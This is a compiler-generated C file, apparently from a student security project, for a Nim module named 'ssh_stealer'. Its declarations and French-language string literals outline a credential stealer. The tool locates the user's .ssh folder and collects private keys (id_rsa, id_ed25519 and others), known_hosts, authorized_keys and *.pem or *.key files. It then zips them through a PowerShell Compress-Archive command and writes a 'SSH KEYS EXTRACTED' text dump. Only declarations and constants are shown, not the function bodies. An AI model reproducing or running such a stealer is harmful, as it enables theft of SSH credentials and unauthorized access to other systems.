/* Generated by Nim Compiler v2.2.4 */
/* Compiled for: Linux, amd64, gcc */
/* Command for C compiler:
   gcc -c  -w -fmax-errors=3 -pthread   -I/usr/lib/nim/lib -I/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer -o /home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/sortie_c/@mssh_stealer.nim.c.o /home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/sortie_c/@mssh_stealer.nim.c */
#define NIM_INTBITS 64

#include "nimbase.h"
#include <string.h>
#include <glob.h>
#include <stdio.h>
#undef LANGUAGE_C
#undef MIPSEB
#undef MIPSEL
#undef PPC
#undef R3000
#undef R4000
#undef i386
#undef linux
#undef mips
#undef near
#undef far
#undef powerpc
#undef unix
#define nimfr_(proc, file) \
  TFrame FR_; \
  FR_.procname = proc; FR_.filename = file; FR_.line = 0; FR_.len = 0; nimFrame(&FR_);

#define nimln_(n) \
  FR_.line = n;

#define nimlf_(n, file) \
  FR_.line = n; FR_.filename = file;

typedef struct NimStrPayload NimStrPayload;
typedef struct NimStringV2 NimStringV2;
typedef struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ tySequence__sM4lkSb7zS6F7OVMvW9cffQ;
typedef struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content;
typedef struct tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A;
typedef struct tyObject_Time__VlA5C5c2557zvTIF6i5qqA tyObject_Time__VlA5C5c2557zvTIF6i5qqA;
typedef struct tyObject_ZonedTime__6VkLCUMFEwsmNIeOzLOtTQ tyObject_ZonedTime__6VkLCUMFEwsmNIeOzLOtTQ;
typedef struct Exception Exception;
typedef struct RootObj RootObj;
typedef struct TNimTypeV2 TNimTypeV2;
typedef struct tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ;
typedef struct tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ_Content tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ_Content;
typedef struct tyObject_StackTraceEntry__Ys9cmA3ckZAVfrZgZt9axXEw tyObject_StackTraceEntry__Ys9cmA3ckZAVfrZgZt9axXEw;
struct NimStrPayload {
	NI cap;
	NIM_CHAR data[SEQ_DECL_SIZE];
};
struct NimStringV2 {
	NI len;
	NimStrPayload* p;
};
struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ {
  NI len; tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content* p;
};
typedef NimStringV2 tyArray__nHXaesL0DJZHyVS07ARPRA[1];
typedef NimStringV2 tyArray__17w6ns39bmjfAZ429aQpCFUA[9];
typedef NCSTRING tyUncheckedArray__nvS6J9clHMUMHfoZd8Ad2zg[1];
typedef NimStringV2 tyArray__Re75IspeoxXy2oCZHwcRrA[2];
typedef NimStringV2 tyArray__24KAM9afIUgUaqBaEBB6r9bg[3];
typedef NimStringV2 tyArray__haiLFy0nBviVTKFGuwztzQ[5];
typedef NU8 tySet_tyEnum_CopyFlag__2lu8VnKKuY6xPpxEv7YWvA;
typedef NU8 tyEnum_FileMode__BzUbNzIgtuxKp78IxN69cmQ;
struct tyObject_Time__VlA5C5c2557zvTIF6i5qqA {
	NI64 seconds;
	NI nanosecond;
};
typedef struct {
N_NIMCALL_PTR(void, ClP_0) (tyObject_Time__VlA5C5c2557zvTIF6i5qqA x_p0, tyObject_ZonedTime__6VkLCUMFEwsmNIeOzLOtTQ* Result, void* ClE_0);
void* ClE_0;
} tyProc__l9b8Jud9blRa9acJ23pvPzCFA;
struct tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A {
	tyProc__l9b8Jud9blRa9acJ23pvPzCFA zonedTimeFromTimeImpl;
	tyProc__l9b8Jud9blRa9acJ23pvPzCFA zonedTimeFromAdjTimeImpl;
	NimStringV2 name;
};
struct TNimTypeV2 {
	void* destructor;
	NI size;
	NI16 align;
	NI16 depth;
	NU32* display;
	void* traceImpl;
	void* typeInfoV1;
	NI flags;
	void* vTable[SEQ_DECL_SIZE];
};
struct RootObj {
	TNimTypeV2* m_type;
};
struct tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ {
  NI len; tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ_Content* p;
};
struct Exception {
	RootObj Sup;
	Exception* parent;
	NCSTRING name;
	NimStringV2 message;
	tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ trace;
	Exception* up;
};
struct tySequence__sM4lkSb7zS6F7OVMvW9cffQ_Content { NI cap; NimStringV2 data[SEQ_DECL_SIZE]; };
struct tyObject_ZonedTime__6VkLCUMFEwsmNIeOzLOtTQ {
	tyObject_Time__VlA5C5c2557zvTIF6i5qqA time;
	NI utcOffset;
	NIM_BOOL isDst;
};
struct tyObject_StackTraceEntry__Ys9cmA3ckZAVfrZgZt9axXEw {
	NCSTRING procname;
	NI line;
	NCSTRING filename;
};
struct tySequence__lQ1UsDGK2GVVm9bDjc3VrPQ_Content { NI cap; tyObject_StackTraceEntry__Ys9cmA3ckZAVfrZgZt9axXEw data[SEQ_DECL_SIZE]; };
N_LIB_PRIVATE N_NIMCALL(void, echoBinSafe)(NimStringV2* args_p0, NI args_p0Len_0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, nsuRepeatStr)(NimStringV2 s_p0, NI n_p1);
N_LIB_PRIVATE N_NIMCALL(tySequence__sM4lkSb7zS6F7OVMvW9cffQ, extractSSHKeys__ssh95stealer_u4)(void);
static N_INLINE(void, nimZeroMem)(void* p_p0, NI size_p1);
static N_INLINE(void, nimSetMem__systemZmemory_u7)(void* a_p0, int v_p1, NI size_p2);
static N_INLINE(NIM_BOOL*, nimErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void*, newSeqPayload)(NI cap_p0, NI elemSize_p1, NI elemAlign_p2);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, getEnv__stdZenvvars_u15)(NimStringV2 key_p0, NimStringV2 default_p1);
static N_INLINE(NimStringV2, slash___stdZprivateZospaths2_u88)(NimStringV2 head_p0, NimStringV2 tail_p1);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, nosjoinPath)(NimStringV2 head_p0, NimStringV2 tail_p1);
static N_INLINE(void, nimFrame)(TFrame* s_p0);
N_LIB_PRIVATE N_NOINLINE(void, callDepthLimitReached__system_u4727)(void);
static N_INLINE(void, popFrame)(void);
N_LIB_PRIVATE N_NIMCALL(NIM_BOOL, nosdirExists)(NimStringV2 dir_p0);
N_LIB_PRIVATE N_NOCONV(void, deallocShared)(void* p_p0);
static N_INLINE(void, nimCopyMem)(void* dest_p0, void* source_p1, NI size_p2);
N_LIB_PRIVATE N_NIMCALL(void, eqcopy___system_u2708)(NimStringV2* dest_p0, NimStringV2 src_p1);
N_LIB_PRIVATE N_NIMCALL(NIM_BOOL, nosfileExists)(NimStringV2 filename_p0);
N_LIB_PRIVATE N_NIMCALL(void, add__stdZenumutils_u70)(tySequence__sM4lkSb7zS6F7OVMvW9cffQ* x_p0, NimStringV2 y_p1);
N_LIB_PRIVATE N_NIMCALL(void, eqwasMoved___system_u2705)(NimStringV2* dest_p0);
static N_INLINE(NCSTRING, nimToCStringConv)(NimStringV2 s_p0);
static N_INLINE(NIM_BOOL, eqeq___system_u8924)(NCSTRING x_p0, NCSTRING y_p1);
N_LIB_PRIVATE N_NIMCALL(void, failedAssertImpl__stdZassertions_u234)(NimStringV2 msg_p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, cstrToNimstr)(NCSTRING str_p0);
N_LIB_PRIVATE N_NIMCALL(void, eqsink___system_u2714)(NimStringV2* dest_p0, NimStringV2 src_p1);
static N_INLINE(NIM_BOOL, contains__stdZenumutils_u50)(NimStringV2* a_p0, NI a_p0Len_0, NimStringV2 item_p1);
static N_INLINE(NI, find__stdZenumutils_u55)(NimStringV2* a_p0, NI a_p0Len_0, NimStringV2 item_p1);
N_LIB_PRIVATE N_NOINLINE(void, raiseIndexError2)(NI i_p0, NI n_p1);
static N_INLINE(NIM_BOOL, eqStrings)(NimStringV2 a_p0, NimStringV2 b_p1);
static N_INLINE(NIM_BOOL, equalMem__system_u1739)(void* a_p0, void* b_p1, NI size_p2);
static N_INLINE(int, nimCmpMem)(void* a_p0, void* b_p1, NI size_p2);
N_LIB_PRIVATE N_NOINLINE(void, raiseOverflow)(void);
N_LIB_PRIVATE N_NIMCALL(void, eqdestroy___system_u3869)(tySequence__sM4lkSb7zS6F7OVMvW9cffQ dest_p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, dollar___systemZdollars_u14)(NI xX60gensym0__p0);
N_LIB_PRIVATE N_NIMCALL(NI64, nosgetFileSize)(NimStringV2 file_p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, nosextractFilename)(NimStringV2 path_p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, dollar___systemZdollars_u34)(NI64 xX60gensym4__p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, packSSHKeys__ssh95stealer_u71)(void);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, nosgetTempDir)(void);
static N_INLINE(void, appendString)(NimStringV2* dest_p0, NimStringV2 src_p1);
static N_INLINE(void, copyMem__system_u1731)(void* dest_p0, void* source_p1, NI size_p2);
N_LIB_PRIVATE N_NOINLINE(void, raiseRangeErrorI)(NI64 i_p0, NI64 a_p1, NI64 b_p2);
N_LIB_PRIVATE N_NIMCALL(NI, getCurrentProcessId__pureZos_u445)(void);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, rawNewString)(NI space_p0);
N_LIB_PRIVATE N_NIMCALL(void, noscreateDir)(NimStringV2 dir_p0);
N_LIB_PRIVATE N_NIMCALL(void, noscopyFile)(NimStringV2 source_p0, NimStringV2 dest_p1, tySet_tyEnum_CopyFlag__2lu8VnKKuY6xPpxEv7YWvA options_p2, NI bufferSize_p3);
N_LIB_PRIVATE N_NIMCALL(NI, nosexecShellCmd)(NimStringV2 command_p0);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, readFile__stdZsyncio_u529)(NimStringV2 filename_p0);
static N_INLINE(void, eqdestroy___system_u281)(NimStringV2 x_p0);
N_LIB_PRIVATE N_NIMCALL(void, nosremoveDir)(NimStringV2 dir_p0, NIM_BOOL checkDir_p1);
N_LIB_PRIVATE N_NIMCALL(void, nosremoveFile)(NimStringV2 file_p0);
N_LIB_PRIVATE N_NIMCALL(void, writeFile__stdZsyncio_u534)(NimStringV2 filename_p0, NimStringV2 content_p1);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, saveSSHKeys__ssh95stealer_u129)(void);
N_LIB_PRIVATE N_NIMCALL(void, eqdestroy___pureZtimes_u1556)(tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A* dest_p0);
N_LIB_PRIVATE N_NIMCALL(FILE*, open__stdZsyncio_u487)(NimStringV2 filename_p0, tyEnum_FileMode__BzUbNzIgtuxKp78IxN69cmQ mode_p1, NI bufSize_p2);
static N_INLINE(void, writeLine__ssh95stealer_u144)(FILE* f_p0, NimStringV2* x_p1, NI x_p1Len_0);
N_LIB_PRIVATE N_NIMCALL(void, write__stdZsyncio_u254)(FILE* f_p0, NimStringV2 s_p1);
N_LIB_PRIVATE N_NIMCALL(NimStringV2, format__ssh95stealer_u137)(tyObject_Time__VlA5C5c2557zvTIF6i5qqA time_p0, tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A* zone_p2);
N_LIB_PRIVATE N_NIMCALL(tyObject_Time__VlA5C5c2557zvTIF6i5qqA, getTime__pureZtimes_u1268)(void);
N_LIB_PRIVATE N_NIMCALL(tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A*, local__pureZtimes_u2057)(void);
N_LIB_PRIVATE N_NIMCALL(void, raiseDefect)(void);
static N_INLINE(void, popCurrentException)(void);
N_LIB_PRIVATE N_NIMCALL(void, eqcopy___stdZtypedthreads_u223)(Exception** dest_p0, Exception* src_p1, NIM_BOOL cyclic_p2);
N_LIB_PRIVATE N_NIMCALL(void, close__stdZsyncio_u268)(FILE* f_p0);
N_LIB_PRIVATE N_NIMCALL(void, nimTestErrorFlag)(void);
N_LIB_PRIVATE N_NIMCALL(void, atmdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsusratslibatsnimatslibatssystemdotnim_Init000)(void);
N_LIB_PRIVATE N_NIMCALL(void, NimMainModule)(void);
static const struct {
  NI cap; NIM_CHAR data[28+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_3 = { 28 | NIM_STRLIT_FLAG, "[*] Extraction des cl\303\251s SSH" };
static const struct {
  NI cap; NIM_CHAR data[1+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_4 = { 1 | NIM_STRLIT_FLAG, "=" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_5 = {1, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_4};
static const struct {
  NI cap; NIM_CHAR data[11+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_6 = { 11 | NIM_STRLIT_FLAG, "USERPROFILE" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_7 = {11, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_6};
static const struct {
  NI cap; NIM_CHAR data[0+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_8 = { 0 | NIM_STRLIT_FLAG, "" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_9 = {0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8};
static const struct {
  NI cap; NIM_CHAR data[4+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_10 = { 4 | NIM_STRLIT_FLAG, ".ssh" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_11 = {4, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_10};
static const struct {
  NI cap; NIM_CHAR data[6+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_13 = { 6 | NIM_STRLIT_FLAG, "id_rsa" };
static const struct {
  NI cap; NIM_CHAR data[6+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_14 = { 6 | NIM_STRLIT_FLAG, "id_dsa" };
static const struct {
  NI cap; NIM_CHAR data[8+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_15 = { 8 | NIM_STRLIT_FLAG, "id_ecdsa" };
static const struct {
  NI cap; NIM_CHAR data[10+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_16 = { 10 | NIM_STRLIT_FLAG, "id_ed25519" };
static const struct {
  NI cap; NIM_CHAR data[11+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_17 = { 11 | NIM_STRLIT_FLAG, "id_ecdsa_sk" };
static const struct {
  NI cap; NIM_CHAR data[13+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_18 = { 13 | NIM_STRLIT_FLAG, "id_ed25519_sk" };
static const struct {
  NI cap; NIM_CHAR data[6+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_19 = { 6 | NIM_STRLIT_FLAG, "config" };
static const struct {
  NI cap; NIM_CHAR data[11+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_20 = { 11 | NIM_STRLIT_FLAG, "known_hosts" };
static const struct {
  NI cap; NIM_CHAR data[15+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_21 = { 15 | NIM_STRLIT_FLAG, "authorized_keys" };
static const struct {
  NI cap; NIM_CHAR data[5+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_22 = { 5 | NIM_STRLIT_FLAG, "*.key" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_23 = {5, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_22};
static const struct {
  NI cap; NIM_CHAR data[87+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_24 = { 87 | NIM_STRLIT_FLAG, "/usr/lib/nim/lib/std/private/osdirs.nim(92, 15) `f`gensym5.gl_pathv[i`gensym5] != nil` " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_25 = {87, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_24};
static const struct {
  NI cap; NIM_CHAR data[5+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_27 = { 5 | NIM_STRLIT_FLAG, "*.pem" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_28 = {5, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_27};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_29 = {87, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_24};
static const struct {
  NI cap; NIM_CHAR data[5+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_30 = { 5 | NIM_STRLIT_FLAG, "*_key" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_31 = {5, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_30};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_32 = {87, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_24};
static const struct {
  NI cap; NIM_CHAR data[28+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_34 = { 28 | NIM_STRLIT_FLAG, "[-] Aucune cl\303\251 SSH trouv\303\251e" };
static const struct {
  NI cap; NIM_CHAR data[23+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_35 = { 23 | NIM_STRLIT_FLAG, "[*] Dossier v\303\251rifi\303\251: " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_36 = {23, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_35};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_37 = {11, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_6};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_38 = {0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_39 = {4, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_10};
static const struct {
  NI cap; NIM_CHAR data[4+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_40 = { 4 | NIM_STRLIT_FLAG, "[+] " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_41 = {4, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_40};
static const struct {
  NI cap; NIM_CHAR data[23+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_42 = { 23 | NIM_STRLIT_FLAG, " fichier(s) trouv\303\251(s):" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_43 = {23, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_42};
static const struct {
  NI cap; NIM_CHAR data[9+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_44 = { 9 | NIM_STRLIT_FLAG, "    \360\237\223\201 " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_45 = {9, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_44};
static const struct {
  NI cap; NIM_CHAR data[2+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_46 = { 2 | NIM_STRLIT_FLAG, " (" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_47 = {2, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_46};
static const struct {
  NI cap; NIM_CHAR data[7+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_48 = { 7 | NIM_STRLIT_FLAG, " bytes)" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_49 = {7, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_48};
static const struct {
  NI cap; NIM_CHAR data[114+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_50 = { 114 | NIM_STRLIT_FLAG, "/usr/lib/nim/lib/system/iterators.nim(254, 11) `len(a) == L` the length of the seq changed while iterating over it" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_51 = {114, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_50};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_52 = {0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8};
static const struct {
  NI cap; NIM_CHAR data[9+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_54 = { 9 | NIM_STRLIT_FLAG, "ssh_keys_" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_55 = {9, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_54};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_56 = {114, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_50};
static const struct {
  NI cap; NIM_CHAR data[12+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_57 = { 12 | NIM_STRLIT_FLAG, "ssh_keys.zip" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_58 = {12, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_57};
static const struct {
  NI cap; NIM_CHAR data[39+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_59 = { 39 | NIM_STRLIT_FLAG, "powershell -c \"Compress-Archive -Path \'" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_60 = {39, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_59};
static const struct {
  NI cap; NIM_CHAR data[22+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_61 = { 22 | NIM_STRLIT_FLAG, "\\*\' -DestinationPath \'" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_62 = {22, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_61};
static const struct {
  NI cap; NIM_CHAR data[9+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_63 = { 9 | NIM_STRLIT_FLAG, "\' -Force\"" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_64 = {9, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_63};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_65 = {0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8};
static const struct {
  NI cap; NIM_CHAR data[22+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_66 = { 22 | NIM_STRLIT_FLAG, "\012[+] Archive cr\303\251\303\251e: " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_67 = {22, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_66};
static const struct {
  NI cap; NIM_CHAR data[6+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_68 = { 6 | NIM_STRLIT_FLAG, " bytes" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_69 = {6, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_68};
static const struct {
  NI cap; NIM_CHAR data[17+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_70 = { 17 | NIM_STRLIT_FLAG, "ssh_keys_test.zip" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_71 = {17, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_70};
static const struct {
  NI cap; NIM_CHAR data[34+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_73 = { 34 | NIM_STRLIT_FLAG, "[+] Sauvegard\303\251: ssh_keys_test.zip" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_74 = {0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_75 = {9, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_54};
static const struct {
  NI cap; NIM_CHAR data[4+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_76 = { 4 | NIM_STRLIT_FLAG, ".txt" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_77 = {4, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_76};
static const struct {
  NI cap; NIM_CHAR data[1+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_78 = { 1 | NIM_STRLIT_FLAG, "\012" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_79 = {1, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_78};
static const struct {
  NI cap; NIM_CHAR data[21+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_80 = { 21 | NIM_STRLIT_FLAG, "SSH KEYS EXTRACTED - " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_81 = {21, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_80};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_82 = {1, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_4};
static const struct {
  NI cap; NIM_CHAR data[6+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_84 = { 6 | NIM_STRLIT_FLAG, "File: " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_85 = {6, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_84};
static const struct {
  NI cap; NIM_CHAR data[8+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_87 = { 8 | NIM_STRLIT_FLAG, "Content:" };
static const struct {
  NI cap; NIM_CHAR data[18+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_89 = { 18 | NIM_STRLIT_FLAG, "  [Unable to read]" };
static const struct {
  NI cap; NIM_CHAR data[1+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_90 = { 1 | NIM_STRLIT_FLAG, "-" };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_91 = {1, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_90};
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_92 = {114, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_50};
static const struct {
  NI cap; NIM_CHAR data[27+1];
} TM__2xpQS59aSyPswVY8RfkDWhg_93 = { 27 | NIM_STRLIT_FLAG, "[+] D\303\251tails sauvegard\303\251s: " };
static const NimStringV2 TM__2xpQS59aSyPswVY8RfkDWhg_94 = {27, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_93};
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_2 = {{28, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_3}}
;
static NIM_CONST tyArray__17w6ns39bmjfAZ429aQpCFUA TM__2xpQS59aSyPswVY8RfkDWhg_12 = {{6, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_13},
{6, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_14},
{8, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_15},
{10, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_16},
{11, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_17},
{13, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_18},
{6, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_19},
{11, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_20},
{15, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_21}}
;
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_33 = {{28, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_34}}
;
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_72 = {{34, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_73}}
;
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_83 = {{0, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_8}}
;
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_86 = {{8, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_87}}
;
static NIM_CONST tyArray__nHXaesL0DJZHyVS07ARPRA TM__2xpQS59aSyPswVY8RfkDWhg_88 = {{18, (NimStrPayload*)&TM__2xpQS59aSyPswVY8RfkDWhg_89}}
;
N_LIB_PRIVATE tySequence__sM4lkSb7zS6F7OVMvW9cffQ keys__ssh95stealer_u185;
extern NIM_THREADVAR NIM_BOOL nimInErrorMode__system_u4509;
extern NIM_THREADVAR TFrame* framePtr__system_u2741;
N_LIB_PRIVATE NimStringV2 zipData__ssh95stealer_u197;
N_LIB_PRIVATE NimStringV2 txtFile__ssh95stealer_u198;
N_LIB_PRIVATE NimStringV2* key__ssh95stealer_u195;
N_LIB_PRIVATE NI64 size__ssh95stealer_u196;
extern NIM_THREADVAR Exception* currException__system_u4154;
static N_INLINE(void, nimSetMem__systemZmemory_u7)(void* a_p0, int v_p1, NI size_p2) {
	void* T1_;
	T1_ = (void*)0;
	T1_ = memset(a_p0, v_p1, ((size_t) (size_p2)));
}
